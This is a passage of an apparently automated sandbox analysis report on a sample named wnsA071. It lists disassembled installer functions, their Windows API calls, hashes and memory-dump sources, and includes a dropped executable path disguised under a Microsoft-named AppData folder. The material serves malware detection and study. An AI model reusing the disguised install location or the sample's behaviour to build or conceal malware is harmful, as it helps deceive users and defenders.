                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                                                                              • String ID: (gD
                                                                                                                                                                                                              • API String ID: 184305955-2450699939
                                                                                                                                                                                                              • Opcode ID: 48a7949b4d51a1ec232375b91bbbfbe9bb62f1b02b2dd2e3074461365575c3ec
                                                                                                                                                                                                              • Instruction ID: dffee297adc4390e0108bf821a76a55ee3af39d38e00891df0cde6976b1e4786
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 48a7949b4d51a1ec232375b91bbbfbe9bb62f1b02b2dd2e3074461365575c3ec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51C1B3B1540600EFDB216FA1EE85D2B3BA8EB85706F10053EFB41B11F1CB7998919B5E
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 0040451E Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                                                                                                                                              • GetSysColor.USER32(?), ref: 004045FE
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                                                                                                                              • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                                                                                                                              • SetCursor.USER32(00000000), ref: 00404720
                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                                                                                                                              • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • N, xrefs: 004046BA
                                                                                                                                                                                                              • "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe", xrefs: 004046FB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                              • String ID: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"$N
                                                                                                                                                                                                              • API String ID: 3103080414-3972352568
                                                                                                                                                                                                              • Opcode ID: ee6812b55728e13701025233a8a1636c33168640e361f3cefbda46e1e37430c8
                                                                                                                                                                                                              • Instruction ID: 4cd1da19937af119875355adca30567c2743cec9092c6b5b68c8bc3b1ab06c36
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee6812b55728e13701025233a8a1636c33168640e361f3cefbda46e1e37430c8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 176181B1900209BFDB109F60DD85EAA7B69FB84354F00853AFB05B72E1DB789D51CB98
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                              • DrawTextW.USER32(00000000,00468240,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                              • String ID: F
                                                                                                                                                                                                              • API String ID: 941294808-1304234792
                                                                                                                                                                                                              • Opcode ID: d1a6ac0749d5adbba1104fe8f7c5c271f621e3b3c45a8bc66e6bce868fb748d7
                                                                                                                                                                                                              • Instruction ID: 5ab7a9dfb5d1aa1389ec6db6610c78830fc9e5957017c9b4d31100662f95375f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1a6ac0749d5adbba1104fe8f7c5c271f621e3b3c45a8bc66e6bce868fb748d7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14418C71800209AFCF058F95DE459AF7BB9FF44314F00842EF591AA1A0CB78D954DFA4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00406034 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                                                                                                                              • GetShortPathNameW.KERNEL32(?,0045EDC8,00000400), ref: 00406078
                                                                                                                                                                                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                                                                                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                                                                                                                              • GetShortPathNameW.KERNEL32(?,0045F5C8,00000400), ref: 00406095
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004060B3
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0045F5C8,C0000000,00000004,0045F5C8,?,?,?,?,?), ref: 004060EE
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,0045E9C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                                                                                                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,004DD000,80000000,00000003), ref: 00405EE2
                                                                                                                                                                                                                • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                              • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                                              • API String ID: 2171350718-461813615
                                                                                                                                                                                                              • Opcode ID: ea336b7c7ee09a778134d66cdc55d59d2776f1992f2862d3dcc69e87973e6afa
                                                                                                                                                                                                              • Instruction ID: a59dba961965db3d83d90a372a5cb94a2ead5b1f2218518f4427fddb9e4ed3d0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea336b7c7ee09a778134d66cdc55d59d2776f1992f2862d3dcc69e87973e6afa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F312771200705BBE2206B628D48F573A6CEF45745F15043EFA46FA2C3DA7CD91586AD
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 004043C6 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                                                                                                                              • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                                                                                                                              • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                                                                                                                              • GetSysColor.USER32(?), ref: 0040444C
                                                                                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00404476
                                                                                                                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                                                                                              • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                                              • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                                                                                                                • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                                              • String ID: 9
                                                                                                                                                                                                              • API String ID: 163830602-2366072709
                                                                                                                                                                                                              • Opcode ID: 624626f4f5892e412f857cef7a92b39e94472dde615dcc0e6b59693489985feb
                                                                                                                                                                                                              • Instruction ID: eb16fdd1ee542fe42bbdfa0ebba740301294627c6441dfc4cb46f4c2e9c1cdcc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 624626f4f5892e412f857cef7a92b39e94472dde615dcc0e6b59693489985feb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF511A75D00219AEDF21DF95DA88AAEB775FF04304F50443BE905B72D0DBB89982CB18
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00405450 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenW.KERNEL32(0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00402F08,0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                                              • lstrcatW.KERNEL32(0043E708,00402F08), ref: 004054AB
                                                                                                                                                                                                              • SetWindowTextW.USER32(0043E708,0043E708), ref: 004054BD
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2531174081-0
                                                                                                                                                                                                              • Opcode ID: d26779cd53d0e13026bfca991753509873890f78f21e0d47ba27efc3128bd531
                                                                                                                                                                                                              • Instruction ID: b152cc9d973ae9b63f3bddadd0b016ecede68a0b65af60167b2766ac6abf260a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d26779cd53d0e13026bfca991753509873890f78f21e0d47ba27efc3128bd531
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1721A171900518BADB119F96DD84ACFBFB5EF44314F10803AF904B22A1C7798A90CFA8
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00402E8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 00402EF5
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(0043E708,00402F08), ref: 004054AB
                                                                                                                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(0043E708,0043E708), ref: 004054BD
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                                                                                                                                • Part of subcall function 00402E72: MulDiv.KERNEL32(00000000,00000064,0002E789), ref: 00402E87
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                                                                                              • String ID: ... %d%%
                                                                                                                                                                                                              • API String ID: 722711167-2449383134
                                                                                                                                                                                                              • Opcode ID: 0fcb82c9706ea5302a04af69b33a80ab5dbc899856dcad255e9a620228d66a26
                                                                                                                                                                                                              • Instruction ID: 498445d7746695eb5746344947d7fa5b32a20b045a0bc4bf054171d5bd846382
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fcb82c9706ea5302a04af69b33a80ab5dbc899856dcad255e9a620228d66a26
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C901C4B0801614EBC7226B60FE4CA9B7B68BB00745B14013BF885F11E1CBB84855EFDE
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00404D1A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                                                                                                                              • GetMessagePos.USER32 ref: 00404D3D
                                                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                              • String ID: f
                                                                                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                                                                                              • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                                              • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

